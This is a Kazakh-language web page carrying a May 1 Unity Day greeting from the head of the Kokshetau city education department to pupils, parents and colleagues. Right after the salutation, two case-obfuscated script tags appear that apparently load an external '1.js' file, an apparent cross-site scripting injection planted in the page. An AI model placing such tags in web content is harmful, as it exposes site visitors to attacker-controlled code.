Құрметті оқушылар, ата-аналар, әріптестер!<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

30.04.2019

 

         Шын көңілмен сіздерді достық, татулық және жасампаздық белгісі – Қазақстан халқының бірлігі күні – 1 Мамыр мерекесімен құттықтаймын!

Қазақстанның көпұлтты халқының татулығы, ынтымақтастығы, бейбітшілігі- біздің еліміздің ең басты байлығы. Дана халқымызда «Қына тасқа қонады, бақ-дәулет тек ынтымағы мен бірлігі бар елге қонады» деген аталы сөз бар. Ел бірлігі, достық пен бауырмалдық, бейбіт күннің, татулықтың темірқазығындай ең басты құндылық – бекем бірлігіміздің арқасында  бүгінде мемлекетіміз өрлеп- өркендеп, ілгері басып келеді. Еліміздің қарқынды дамуымен бірге білім беру саласы да жаңарып, ілгерілеу үстінде.

          Баршаңызға ізгі ниетпен зор денсаулық, таусылмас күш-қуат, еңбекте табыс тілеймін.

Қазақстан халқы өркен жайып, мемлекетіміз – молшылыққа, ал әрбір шаңырақ бақыт пен шаттыққа кенелсін!    

 

«Көкшетау қаласының білім бөлімі» ММ

басшысы                                                                                            Б.А. Жусупов                    

Просмотров: 901


Пікір қосу



Деректерді қолтаңбаға қосу